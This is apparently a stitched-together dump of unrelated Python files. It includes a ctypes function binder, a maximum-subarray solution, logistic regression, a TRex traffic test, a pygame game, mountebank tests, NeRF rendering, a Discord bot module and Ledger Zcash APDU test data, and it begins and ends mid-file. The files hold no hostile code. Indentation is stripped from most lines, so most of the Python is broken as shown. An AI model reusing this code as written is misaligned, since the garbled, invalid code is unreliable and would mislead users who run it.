template_mapping[ptype.tname] = expected_ctype = ctype
assert ctype == expected_ctype,\
TypeError('Expected Type {} instead of {}'.format(
expected_ctype, ctype))
data = ctypes.cast(data, ctype)
else:
dev_id = None
if isinstance(ptype, TemplateType):
data = var
ctype = type(var) if hasattr(
var, '_type_') else UnknownCType(ptype.tname)
else:
data = var if isinstance(
var, ctypes.c_void_p) else ptype.ctype(var)
ctype = ptype.ctype
return data, dev_id, ctype
extra_pars = [noncontiguous_list, template_mapping]
for var, ptype in zip(args_gen(), self.par_type):
assert not isinstance(ptype, (list, tuple)),\
                Exception('list or tuple input variables are not supported yet')
data, aid, ctype = analyze_element(var, ptype, *extra_pars)
arg_datas.append(data)
if isinstance(ctype, UnknownCType):
ctype.is_const = ptype.is_const
arg_types.append(ctype)
else:
arg_types.append(DType(ctype, is_const=ptype.is_const))
if aid is not None:
if dev_id is not None:
assert aid == dev_id, ValueError(
"Don't use multiple devices in a call :-(")
else:
dev_id = aid
# try to know the unknown ctype
for i, a in enumerate(arg_types):
if isinstance(a, UnknownCType):
assert a.tname in template_mapping,\
Exception('Unknown template name: {}'.format(a.tname))
ctype = template_mapping[a.tname]._type_
arg_types[i] = DType(ctype, a.is_const)
arg_datas[i] = ctype(arg_datas[i])
rtn = self.func(arg_datas=arg_datas,
arg_types=arg_types,
dev_id=dev_id)
for source, target in noncontiguous_list:
source[:] = target
return rtn
    def build(self, ctx, template_types=None):
        """Build this function.
        Parameters
        ----------
        ctx: str
            context name
        template_types: list or tuple or dict, default: None
            list or tuple:
                an ordered sequence of template type names
            dict:
                a mapping from template name to type name
        Examples:
            mobula.func.add.build('cpu', ['float'])
        """
        if template_types is None:
            template_types = []
        arg_types = []
        if isinstance(template_types, (list, tuple)):
            # copy so pop(0) below does not mutate the caller's sequence
            template_types = list(template_types)
            template_mapping = dict()  # tname -> ctype
for t in self.par_type:
if isinstance(t, TemplateType):
tname = t.tname
if tname in template_mapping:
ctype = template_mapping[tname]
else:
ctype = getattr(ctypes, 'c_{}'.format(
template_types.pop(0)))
template_mapping[tname] = ctype
arg_types.append(t(ctype))
else:
arg_types.append(t)
            assert not template_types, Exception('redundant template types')
else:
assert isinstance(template_types, dict), TypeError(
'The type of template_types should be list or tuple or dict.')
template_name = set()
for t in self.par_type:
if isinstance(t, TemplateType):
tname = t.tname
assert tname in template_types, KeyError(
'Unknown Template Type: {}'.format(tname))
template_name.add(tname)
ctype = getattr(ctypes, 'c_{}'.format(
template_types[tname]))
arg_types.append(t(ctype))
else:
arg_types.append(t)
assert len(template_name) == len(template_types), Exception(
'Different template name: {} vs {}'.format(template_name, set(template_types.keys())))
func = self.func
func.loader(func, arg_types, ctx, **func.loader_kwargs)
def bind(functions):
for k, func in functions.items():
assert k not in globals(), "Duplicated function name %s" % k
globals()[k] = MobulaFunc(k, func)
|
# 53. Maximum Subarray
# --------------------
#
# Given an integer array `nums`, find the contiguous subarray (containing at least one number) which has the largest
# sum and return *its sum*.
#
# ### Constraints:
#
# * `1 <= nums.length <= 3 * 10^4`
# * `-10^5 <= nums[i] <= 10^5`
#
# **Follow up:** If you have figured out the `O(n)` solution, try coding another solution using the **divide and
# conquer** approach, which is more subtle.
from typing import List
from collections import namedtuple
IntervalValue = namedtuple('IntervalValue', 'optimal left_suboptimal right_suboptimal total')
def singleton(num):
return IntervalValue(num, num, num, num)
def combine(lhs, rhs):
return IntervalValue(
optimal = max(lhs.optimal, lhs.left_suboptimal + rhs.right_suboptimal, rhs.optimal),
left_suboptimal = max(lhs.left_suboptimal + rhs.total, rhs.left_suboptimal),
right_suboptimal = max(lhs.right_suboptimal, lhs.total + rhs.right_suboptimal),
total = lhs.total + rhs.total
)
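# For reference, a minimal sketch of the O(n) single-pass (Kadane-style)
# solution mentioned in the follow-up above (added for illustration; this file
# implements the divide-and-conquer variant below):
def max_subarray_linear(nums: List[int]) -> int:
    best = current = nums[0]
    for num in nums[1:]:
        current = max(num, current + num)  # extend the current run or restart
        best = max(best, current)
    return best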
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
def recur(start, end):
if end - start == 1:
return singleton(nums[start])
middle = (start + end) // 2
lhs = recur(start, middle)
rhs = recur(middle, end)
return combine(lhs, rhs)
if not nums:
return 0
return recur(0, len(nums)).optimal
if __name__ == '__main__':
s = Solution()
# Example 1:
#
# Input: nums = [-2,1,-3,4,-1,2,1,-5,4]
# Output: 6
# Explanation: [4,-1,2,1] has the largest sum = 6.
print(f"{s.maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4])} == 6")
# Example 2:
#
# Input: nums = [1]
# Output: 1
print(f"{s.maxSubArray([1])} == 1")
# Example 3:
#
# Input: nums = [5,4,-1,7,8]
# Output: 23
print(f"{s.maxSubArray([5, 4, -1, 7, 8])} == 23") |
def inclusiveFor(*args):
    argsNum = len(args)
    start = 0
    step = 1
    stop = 0
    if argsNum == 0:
        raise TypeError(f'Expected at least one argument. Found {argsNum}')
    elif argsNum == 1:
        stop = args[0]
    elif argsNum == 2:
        (start, stop) = args
    elif argsNum == 3:
        (start, stop, step) = args
    else:
        raise TypeError(f'Expected up to three arguments. Found {argsNum}')
    # validate the range only after the arity checks, so calls with too many
    # arguments report the arity error rather than a range error
    if argsNum >= 2 and start > stop:
        raise ValueError('Starting position should be less than or equal to the stop value.')
    i = start
    while i <= stop:
        yield i
        i += step
for i in inclusiveFor(22, 22, 3):
print(i, end=' ', flush=True)
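# More usage sketches: inclusiveFor(3) yields 0 1 2 3, and
# inclusiveFor(1, 5) yields 1 2 3 4 5 (both endpoints included).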
|
"""
Logistic Regression (Stochastic Gradient Descent) implemented in Python
Χ: input data
y: target value
y_hat: prediction
w: weights
b: bias
"""
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
class LogReg():
def __init__(self,X,y,iters=1000, batch_size=32, learning_rate=10):
self.X = X
self.y = y
self.m,self.n = self.X.shape # m: training examples, n:number of features
self.learning_rate = learning_rate
self.batch_size = batch_size
self.iters = iters
def sigmoid(self, x):
z = 1/(1+np.exp(-x))
return z
def cost_function(self, y, y_hat):
cost = (np.dot((-y.T), np.log(y_hat)) - np.dot((1-y).T, np.log(1-y_hat))) / self.m
return cost
def grads(self, X, y, y_hat):
# Gradient of weights
dw = (1/self.m)*np.dot(X.T, (y_hat - y))
# Gradient of bias
db = (1/self.m)*np.sum((y_hat - y))
return dw, db
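        # These follow from the binary cross-entropy cost above:
        # dJ/dw = (1/m) * X^T (y_hat - y),  dJ/db = (1/m) * sum(y_hat - y)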
def fit(self):
#initialize weights and bias with zero
self.w = np.zeros((self.n,1))
self.b = 0
#reshape y
self.y = self.y.reshape(self.m,1)
#normalize X
self.X = self.X / np.linalg.norm(self.X)
        # split the data into `batch_size` batches
        # (note: np.array_split(a, n) creates n chunks, so batch_size here is
        # the number of batches, not the number of samples per batch)
        X_batch = np.array_split(self.X, self.batch_size)
        y_batch = np.array_split(self.y, self.batch_size)
losses = []
for epoch in range(self.iters):
for i,x_batch in enumerate(X_batch):
y_hat = self.sigmoid(np.dot(x_batch,self.w) + self.b)
dw,db = self.grads(x_batch, y_batch[i], y_hat)
#update parameters
self.w -= self.learning_rate * dw
self.b -= self.learning_rate * db
cost = self.cost_function(self.y, self.sigmoid(np.dot(self.X, self.w) + self.b))
losses.append(cost)
return losses
def predict(self,X):
#normalize X
X = X / np.linalg.norm(X)
preds = self.sigmoid(np.dot(X,self.w) + self.b)
predictions = [1 if pred>0.5 else 0 for pred in preds]
return predictions
if __name__ == '__main__':
X, y = make_classification(n_samples=10000,n_features=5, n_redundant=0,
n_informative=2, random_state=1,
n_clusters_per_class=1)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size = 0.3, random_state=7)
LR = LogReg(X_train, y_train)
LR.fit()
y_pred = LR.predict(X_test)
print(classification_report(y_test,y_pred))
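    # fit() returns the per-epoch training costs, so convergence could be
    # inspected with e.g. (sketch; note fit() was already called above):
    #   losses = LR.fit()
    #   print('final cost:', float(np.ravel(losses[-1])[0]))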
|
import stl_path
from trex.stl.api import *
from pprint import pprint
import time
import re
import random
class DynamicProfileTest:
def __init__(self,
client,
streams,
min_rand_duration,
max_rand_duration,
min_tick,
max_tick,
duration,
rate
):
        self.rate = rate
self.c = client
self.streams = streams
self.min_rand_duration = min_rand_duration
self.max_rand_duration = max_rand_duration
self.min_tick = min_tick
self.max_tick = max_tick
self.duration = duration
def is_profile_end_msg(self,msg):
m = re.match(r"Profile (\d+).profile_(\d+) job done", msg)
if m:
return [int(m.group(1)),int(m.group(2))]
else:
return None
def build_profile_id (self,port_id,profile_id):
profile_name = "{}.profile_{}".format(port_id,profile_id)
return profile_name
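        # e.g. build_profile_id(0, 3) -> "0.profile_3", the exact name format
        # parsed back by is_profile_end_msg() above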
def build_streams (self):
streams_all = []
packet = (Ether() /
IP(src="16.0.0.1",dst="48.0.0.1") /
UDP(sport=1025,dport=1025) /
Raw(load='\x55' * 10)
)
for o in range(0,self.streams):
s1 = STLStream(packet = STLPktBuilder(pkt = packet),
mode = STLTXCont())
streams_all.append(s1)
return (streams_all)
def run_test (self):
passed = True
        c = self.c
try:
# connect to server
c.connect()
# prepare our ports
c.reset(ports = [0])
port_id = 0
profile_id = 0
tick_action = 0
profiles ={}
tick = 1
max_tick = self.duration
stop = False
c.clear_stats()
            c.clear_events()
while True:
if tick > tick_action and (tick<max_tick):
profile_name = self.build_profile_id(port_id,profile_id)
duration = random.randrange(self.min_rand_duration,self.max_rand_duration)
stream_ids = c.add_streams(streams = self.build_streams(), ports = [profile_name])
profiles[profile_id] = 1
print(" {} new profile {} {} {}".format(tick,profile_name,duration,len(profiles)) )
c.start(ports = [profile_name], mult = self.rate, duration = duration)
profile_id += 1
tick_action = tick + random.randrange(self.min_tick,self.max_tick) # next action
                time.sleep(1)
                tick += 1
                # check events
                while True:
                    event = c.pop_event()
                    if event is None:
                        break
                    else:
                        profile = self.is_profile_end_msg(event.msg)
                        if profile:
                            p_id = profile[1]
                            assert(profiles[p_id]==1)
                            del profiles[p_id]
                            print(" {} del profile {} {}".format(tick,p_id,len(profiles)))
                if tick>=max_tick and (len(profiles)==0):
                    print("stop")
                    stop = True
                if stop:
                    break
r = c.get_profiles_with_state("active")
print(r)
assert( len(r) == 0 )
stats = c.get_stats()
diff = stats[1]["ipackets"] - stats[0]["opackets"]
print(" diff {} ".format(diff))
assert(diff<2)
except STLError as e:
passed = False
print(e)
finally:
c.disconnect()
if c.get_warnings():
print("\n\n*** test had warnings ****\n\n")
for w in c.get_warnings():
print(w)
if passed and not c.get_warnings():
return True
else:
return False
def simple_multi_burst (server):
c = STLClient(server = server)
    test = DynamicProfileTest(c,
                              streams=100,
                              min_rand_duration=1,
                              max_rand_duration=50,
                              min_tick=1,
                              max_tick=2,
                              duration=20,
                              rate="10kpps")
print(test.run_test())
simple_multi_burst ("csi-kiwi-02")
|
import pygame
from random import randint
pygame.init()
if __name__ == '__main__':
#func
def move_with_arrows(x, speed):
keys = pygame.key.get_pressed() #checking pressed keys
if keys[pygame.K_RIGHT]:
x += speed
if keys[pygame.K_LEFT]:
x -= speed
return x
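    # move_with_arrows() returns the updated x instead of mutating state, so
    # the game loop below can gate movement on allow_movement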
playerIMG = pygame.image.load('img\\player.png')
objectIMG = pygame.image.load('img\\object.png')
grassIMG = pygame.image.load('img\\grass.png')
icon = pygame.image.load('img\\icon.ico')
def player(x, y, size):
screen.blit(playerIMG,(x,y))
#pygame.draw.rect(screen, BLUE, [x, y, size, size],0)
def Object(x, y, size):
screen.blit(objectIMG,(x,y))
#pygame.draw.rect(screen, RED, [x, y, size, size],0)
def draw_text(text, font_name, size, color, x, y):
'''This is an edited function from:
https://stackoverflow.com/questions/20842801/how-to-display-text-in-pygame
It is used to make text appear on the screen.
'''
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, color)
screen.blit(text_surface, dest=(x,y))
# Define some colors
BLACK = ( 0, 0, 0)
WHITE = ( 255, 255, 255)
GREEN = ( 0, 255, 0)
RED = ( 255, 0, 0)
GRAY = (100, 100, 100)
BLUE = (0, 0, 255)
LIGHTBLUE = (130, 182, 236)
# Open a new window
size = (800, 600)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Dodge Ball! 1.0")
pygame.display.set_icon(icon)
psize = 50
default_pspeed = 5
pspeed = default_pspeed
player_speed_increase = True
px = size[0]/2
allow_movement = True
osize = 50
rx = randint(0, size[0]-osize)
    ry = randint(osize, size[1]//3)  # integer division: randint needs int bounds
i=0
speeduprate=10
sur=speeduprate
default_speed = 5
speed=default_speed
object_player_collisions=True
debug = False
collision=False
carryOn = True
clock = pygame.time.Clock()
while carryOn:
for event in pygame.event.get():
if event.type == pygame.QUIT:
carryOn = False
key_input = pygame.key.get_pressed()
        if key_input[pygame.K_F3]:
            # note: this toggles once per frame while F3 is held
            debug = not debug
            print('debug=' + str(debug))
screen.fill(LIGHTBLUE)
screen.blit(grassIMG,(0,size[1]-50))
#pygame.draw.rect(screen, RED, [55, 200, 100, 70],0)
#pygame.draw.line(screen, WHITE, [0, 0], [100, 100], 1)
#pygame.draw.ellipse(screen, BLACK, [20,20,250,100], 2)
#Wall collisions
if px <= 0:
px = 1
elif px+psize >= size[0]:
px = size[0]-1-psize
#movement and player func
if allow_movement:
px = move_with_arrows(px, pspeed)
player(px, size[1]-(psize*2), psize)
if debug:
pygame.draw.line(screen, RED, [px, size[1]-(psize*2)], [px+psize, size[1]-psize], 5)
#objects
Object(rx, ry, osize)
if debug:
pygame.draw.line(screen, BLUE, [rx, ry], [rx+osize, ry+osize], 5)
        i+=1
        updatepersec = 1
        if allow_movement:
            if i == updatepersec:
                i=0
                ry+=speed
            #when hit ground
            if ry >= size[1]-osize:
                rx = randint(0, size[0]-osize)
                ry = randint(osize, size[1]//3)  # integer division: randint needs int bounds
                sur-=1
                if sur == 0:
                    sur=speeduprate
                    speed+=1
                    if player_speed_increase:
                        pspeed+=1
#object vs player collisions
if object_player_collisions:
#if object has the same y level as player
if ry in range(size[1]-(psize*2), size[1]-psize) or ry+osize in range(size[1]-(psize*2), size[1]-psize):
#if object is touching player
if rx in range(int(px), int(px+psize)) or rx+osize in range(int(px), int(px+psize)):
allow_movement=False
collision=True
draw_text('GAME OVER', 'fonts\\Press_Start_2P\\PressStart2P-Regular.ttf', 50, BLACK, (size[0]/2)-220, (size[1]/2)-50)
draw_text('PRESS SPACE TO CONTINUE', 'fonts\\Press_Start_2P\\PressStart2P-Regular.ttf', 20, BLACK, (size[0]/2)-220, (size[1]/2))
keys = pygame.key.get_pressed() #checking pressed keys
if keys[pygame.K_SPACE]:
                        rx = randint(0, size[0]-osize)
                        ry = randint(osize, size[1]//3)  # integer division: randint needs int bounds
allow_movement=True
speed=default_speed
pspeed = default_pspeed
sur=speeduprate
i=0
collision=False
#debug screen
if debug:
Roboto = 'fonts\\Roboto\\Roboto-Regular.ttf'
fs = 15
draw_text('debug='+str(debug), Roboto, fs, WHITE, 10, 10)
draw_text('player=('+str(px)+', '+str(size[1]-(psize*2))+')', Roboto, fs, WHITE, 10, 25)
draw_text('object=('+str(rx)+', '+str(ry)+')', Roboto, fs, WHITE, 10, 40)
draw_text('player_speed='+str(pspeed), Roboto, fs, WHITE, 10, 55)
draw_text('object_speed='+str(speed), Roboto, fs, WHITE, 10, 70)
draw_text('collision='+str(collision), Roboto, fs, WHITE, 10, 85)
pygame.mouse.set_visible(False)
pygame.display.flip()
clock.tick(60)
pygame.quit()
|
# encoding=utf-8
import logging
import requests
from brunns.matchers.object import between
from brunns.matchers.response import is_response
from contexttimer import Timer
from hamcrest import assert_that
from mbtest.imposters import Imposter, Predicate, Response, Stub
logger = logging.getLogger(__name__)
def test_wait(mock_server):
imposter = Imposter(Stub(responses=Response(wait=100)))
with mock_server(imposter), Timer() as timer:
requests.get(imposter.url)
assert_that(timer.elapsed, between(0.1, 0.25))
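    # note: mountebank 'wait' values are milliseconds, while timer.elapsed is
    # in seconds, hence wait=100 asserting roughly 0.1-0.25 s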
def test_wait_function(mock_server):
imposter = Imposter(
Stub(responses=Response(wait="function() { return Math.floor(Math.random() * 50) + 100; }"))
)
with mock_server(imposter), Timer() as timer:
requests.get(imposter.url)
assert_that(timer.elapsed, between(0.1, 0.5))
def test_repeat(mock_server):
# Given
imposter = Imposter(
Stub(Predicate(), [Response(body="oranges", repeat=2), Response(body="apples")])
)
with mock_server(imposter) as s:
logger.debug("server: %s", s)
# When
r1 = requests.get(imposter.url)
r2 = requests.get(imposter.url)
r3 = requests.get(imposter.url)
# Then
assert_that(r1, is_response().with_body("oranges"))
assert_that(r2, is_response().with_body("oranges"))
assert_that(r3, is_response().with_body("apples"))
|
import torch
from .nerf_helpers import get_minibatches, ndc_rays
from .nerf_helpers import sample_pdf_2 as sample_pdf
from .volume_rendering_utils import volume_render_radiance_field
local_chunksize=131072
def run_network(network_fn, pts, viewdirs, chunksize, embed_fn, embeddirs_fn, code=None):
pts_flat = pts.reshape((-1, pts.shape[-1]))
embedded = embed_fn(pts_flat)
if code is not None:
embedded = torch.cat([embedded, code[:,None].repeat(1,pts.shape[1], 1).view(-1,code.shape[-1])],1)
if embeddirs_fn is not None:
viewdirs = viewdirs[..., None, -3:]
input_dirs = viewdirs.expand(pts.shape)
input_dirs_flat = input_dirs.reshape((-1, input_dirs.shape[-1]))
embedded_dirs = embeddirs_fn(input_dirs_flat)
embedded = torch.cat((embedded, embedded_dirs), dim=-1)
batches = get_minibatches(embedded, chunksize=chunksize)
preds = [network_fn(batch) for batch in batches]
radiance_field = torch.cat(preds, dim=0)
radiance_field = radiance_field.reshape(
list(pts.shape[:-1]) + [radiance_field.shape[-1]]
)
return radiance_field
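# Shape sketch for run_network above (illustrative): pts of shape (R, S, 3)
# is flattened to (R*S, 3) before embedding; after the batched forward passes,
# the output is reshaped back to (R, S, C), where C is the number of network
# output channels (typically RGB + density).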
def predict_and_render_radiance(
ray_batch,
model_coarse,
model_fine,
mode="train",
encode_position_fn=None,
encode_direction_fn=None,
is_train=True,
radiance_field_noise_std=0.2,
):
# TESTED
num_rays = ray_batch.shape[0]
ro, rd = ray_batch[..., :3], ray_batch[..., 3:6]
bounds = ray_batch[..., 6:8].view((-1, 1, 2))
near, far = bounds[..., 0], bounds[..., 1]
# TODO: Use actual values for "near" and "far" (instead of 0. and 1.)
# when not enabling "ndc".
t_vals = torch.linspace(
0.0,
1.0,
64,
dtype=ro.dtype,
device=ro.device,
)
z_vals = near * (1.0 - t_vals) + far * t_vals
z_vals = z_vals.expand([num_rays, 64])
if is_train:
# noise
# Get intervals between samples.
mids = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])
upper = torch.cat((mids, z_vals[..., -1:]), dim=-1)
lower = torch.cat((z_vals[..., :1], mids), dim=-1)
# Stratified samples in those intervals.
t_rand = torch.rand(z_vals.shape, dtype=ro.dtype, device=ro.device)
z_vals = lower + (upper - lower) * t_rand
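        # i.e. one uniform draw per bin: z = lower + (upper - lower) * u with
        # u ~ U(0, 1), keeping the samples stratified along each ray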
# pts -> (num_rays, N_samples, 3)
pts = ro[..., None, :] + rd[..., None, :] * z_vals[..., :, None]
radiance_field = run_network(
model_coarse,
pts,
ray_batch[..., -3:],
local_chunksize,
encode_position_fn,
encode_direction_fn,
)
(
rgb_coarse,
disp_coarse,
acc_coarse,
weights,
depth_coarse,
) = volume_render_radiance_field(
radiance_field,
z_vals,
rd/rd.norm(2,-1).unsqueeze(-1),
radiance_field_noise_std=radiance_field_noise_std,
white_background=False,
)
# fine pass
z_vals_mid = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])
z_samples = sample_pdf(
z_vals_mid,
weights[..., 1:-1],
64,
det=(not is_train),
)
z_samples = z_samples.detach()
z_vals, _ = torch.sort(torch.cat((z_vals, z_samples), dim=-1), dim=-1)
# pts -> (N_rays, N_samples + N_importance, 3)
pts = ro[..., None, :] + rd[..., None, :] * z_vals[..., :, None]
radiance_field = run_network(
model_fine,
pts,
ray_batch[..., -3:],
local_chunksize,
encode_position_fn,
encode_direction_fn,
)
rgb_fine, disp_fine, acc_fine, _, depth_fine = volume_render_radiance_field(
radiance_field,
z_vals,
rd/rd.norm(2,-1).unsqueeze(-1),
radiance_field_noise_std=radiance_field_noise_std,
white_background=False,
)
return rgb_coarse, disp_coarse, acc_coarse, rgb_fine, disp_fine, acc_fine, depth_coarse, depth_fine
def run_one_iter_of_nerf(
height,
width,
focal_length,
depth,
model_coarse,
model_fine,
ray_origins,
ray_directions,
mode="train",
encode_position_fn=None,
encode_direction_fn=None,
is_train=True,
radiance_field_noise_std=0.2,
):
# Provide ray directions as input
viewdirs = ray_directions
#viewdirs = viewdirs / viewdirs.norm(p=2, dim=-1).unsqueeze(-1)
viewdirs = viewdirs.reshape((-1, 3))
# Cache shapes now, for later restoration.
restore_shapes = [
ray_directions.shape,
ray_directions.shape[:-1],
ray_directions.shape[:-1],
]
if model_fine:
restore_shapes += restore_shapes
ro = ray_origins.reshape((-1, 3))
rd = ray_directions.reshape((-1, 3))
near = (depth-1).reshape(-1,1)
far = (depth+1).reshape(-1,1)
rays = torch.cat((ro, rd, near, far), dim=-1)
rays = torch.cat((rays, viewdirs), dim=-1)
batches = get_minibatches(rays, chunksize=local_chunksize)
pred = [
predict_and_render_radiance(
batch,
model_coarse,
model_fine,
encode_position_fn=encode_position_fn,
encode_direction_fn=encode_direction_fn,
is_train=is_train,
radiance_field_noise_std=radiance_field_noise_std,
)
for batch in batches
]
synthesized_images = list(zip(*pred))
synthesized_images = [
torch.cat(image, dim=0) if image[0] is not None else (None)
for image in synthesized_images
]
if mode == "validation":
synthesized_images = [
image.view(shape) if image is not None else None
for (image, shape) in zip(synthesized_images, restore_shapes)
]
# Returns rgb_coarse, disp_coarse, acc_coarse, rgb_fine, disp_fine, acc_fine
# (assuming both the coarse and fine networks are used).
if model_fine:
return tuple(synthesized_images)
else:
        # If the fine network is not used, rgb_fine, disp_fine, acc_fine are
        # set to None.
        return tuple(synthesized_images + [None, None, None])
|
import random
from dbots.cmd import *
from util import *
from .transform import NUMBERS
class FunModule(Module):
@Module.command(extends=dict(
count="The count of dice to roll",
private="Whether the result should be shown to everyone"
))
async def roll(self, ctx, count: int = 1, public: bool = True):
"""
        Roll one or multiple dice
"""
count = min(max(count, 1), 50)
if count > 1:
result = {}
for i in range(count):
value = random.randint(1, 6)
if value in result:
result[value] += 1
else:
result[value] = 1
total = sum([k * v for k, v in result.items()])
result_text = "\n".join([
f"**{NUMBERS[r].title()}** was rolled **{result[r]}** time(s)."
for r in sorted(result)
])
text = f":game_die: **I rolled {count} dice**:\n" \
f"{result_text}\n" \
f"The total is: **{total}**."
else:
            value = random.randint(1, 6)  # randint includes both endpoints, unlike randrange
text = f":game_die: I rolled a die and the result is **{NUMBERS[value].title()}**."
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command(extends=dict(
public="Whether the result should be shown to everyone"
))
async def choose(self, ctx, option_a, option_b, option_c=None, option_d=None, option_e=None, public: bool = True):
"""
Randomly choose between two or more options
"""
options = list(filter(lambda o: o is not None, [option_a, option_b, option_c, option_d, option_e]))
result = random.choice(options)
option_text = " and ".join(", ".join([f"**{o}**" for o in options]).rsplit(", ", 1))
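        # e.g. ["a", "b", "c"] -> "**a**, **b** and **c**" (rsplit swaps the
        # last comma for "and")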
text = f"I chose between {option_text} and my choice is: **{result}**."
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command(extends=dict(
public="Whether the result should be shown to everyone"
))
async def coin(self, ctx, public: bool = True):
"""
Flip a coin
"""
result = random.choice(["Heads", "Tails"])
text = f":coin: I flipped a coin and it landed on: **{result}**!"
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command(extends=dict(
min="The minimum number",
max="The maximum number",
public="Whether the result should be shown to everyone"
))
async def random(self, ctx, min: int = 0, max: int = 100, public: bool = True):
"""
Get a random number between min and max
"""
        if min > max:
            min, max = max, min  # avoid ValueError from randint when min > max
        result = random.randint(min, max)
text = f"I chose a number between **{min}** and **{max}** and my choice is: **{result}**."
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command()
async def monox(self, ctx, message=""):
"""
monox
"""
await send_webhook_response(ctx, f"{message} <a:monoxpat:797866087000702986>")
|
import pytest
from dataclasses import dataclass, field
from functools import reduce
from typing import List, Optional
from helpers.basetest import BaseTestBtc, LedgerjsApdu, TxData, CONSENSUS_BRANCH_ID
from helpers.deviceappbtc import DeviceAppBtc, CommException
# Test data below is from a Zcash test log from the Live team
test_zcash_prefix_cmds = [
LedgerjsApdu( # Get version
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102" # i.e. "Zcash" + "1.3.23" (not checked)
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000000", # GET PUBLIC KEY - on 44'/133'/0'/0/0 path
"e016000000", # Coin info
],
expected_resp="1cb81cbd01055a63617368035a4543" # "Zcash" + "ZEC"
),
LedgerjsApdu(
commands=[
"e040000009028000002c80000085", # Get Public Key - on path 44'/133'
"e016000000", # Coin info
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=[
"e040000009028000002c80000085", # path 44'/133'
"e04000000d038000002c8000008580000000", # path 44'/133'/0'
"e04000000d038000002c8000008580000001", # path 44'/133'/1'
"b001000000"
],
# expected_resp="01055a63617368--------------0102"
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000004", # Get Public Key - on path 44'/133'/0'/0/4
"e016000000", # Coin info
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000004", # Get Public Key - on path 44'/133'/0'/0/4
"e016000000"
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
)
]
test_zcash_tx_sign_gti = [
LedgerjsApdu( # GET TRUSTED INPUT
commands=[
"e042000009000000010400008001",
"e042800025edc69b8179fd7c6a11a8a1ba5d17017df5e09296c3a1acdada0d94e199f68857010000006b",
"e042800032483045022100e8043cd498714122a78b6ecbf8ced1f74d1c65093c5e2649336dfa248aea9ccf022023b13e57595635452130",
"e0428000321c91ed0fe7072d295aa232215e74e50d01a73b005dac01210201e1c9d8186c093d116ec619b7dad2b7ff0e7dd16f42d458da",
"e04280000b1100831dc4ff72ffffff00",
"e04280000102",
"e042800022a0860100000000001976a914fa9737ab9964860ca0c3e9ad6c7eb3bc9c8f6fb588ac",
"e0428000224d949100000000001976a914b714c60805804d86eb72a38c65ba8370582d09e888ac",
"e04280000400000000",
],
expected_resp="3200" + "--"*2 + "20b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51010000004d94910000000000" + "--"*8
),
]
test_zcash_tx_to_sign_abandonned = [
LedgerjsApdu( # GET PUBLIC KEY
commands=["e040000015058000002c80000085800000000000000100000001"], # on 44'/133'/0'/1/1
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT START
commands=[
"e0440005090400008085202f8901",
"e04480053b013832004d0420b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51010000004d9491000000000045e1e144cb88d4d800",
"e044800504ffffff00",
]
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL
commands=[
"e04aff0015058000002c80000085800000000000000100000003",
# "e04a0000320240420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac39498200000000001976a91425ea06"
"e04a0000230140420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
], # tx aborted on 2nd command
expected_sw="6985"
),
]
test_zcash_tx_sign_restart_prefix_cmds = [
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000004",
"e016000000",
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
)
]
test_zcash_tx_to_sign_finalized = test_zcash_tx_sign_gti + [
LedgerjsApdu( # GET PUBLIC KEY
commands=["e040000015058000002c80000085800000000000000100000001"], # on 44'/133'/0'/1/1
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT START
commands=[
"e0440005090400008085202f8901",
"e04480053b""013832004d""0420b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51""01000000""4d94910000000000""45e1e144cb88d4d8""00",
"e044800504ffffff00",
]
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL
commands=[
"e04aff0015058000002c80000085800000000000000100000003",
# "e04a0000320240420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac39498200000000001976a91425ea06"
"e04a0000230140420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
"e04a8000045eb3f840"
],
expected_resp="0000"
),
LedgerjsApdu(
commands=[
"e044008509""0400008085202f8901",
"e04480853b""013832004d04""20b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51""01000000""4d94910000000000""45e1e144cb88d4d8""19",
"e04480851d""76a9140a146582553b2f5537e13cef6659e82ed8f69b8f88ac""ffffff00",
"e048000015""058000002c80000085800000000000000100000001"
],
check_sig_format=True
)
]
ledgerjs_test_data = [
test_zcash_prefix_cmds, test_zcash_tx_sign_gti, test_zcash_tx_to_sign_abandonned,
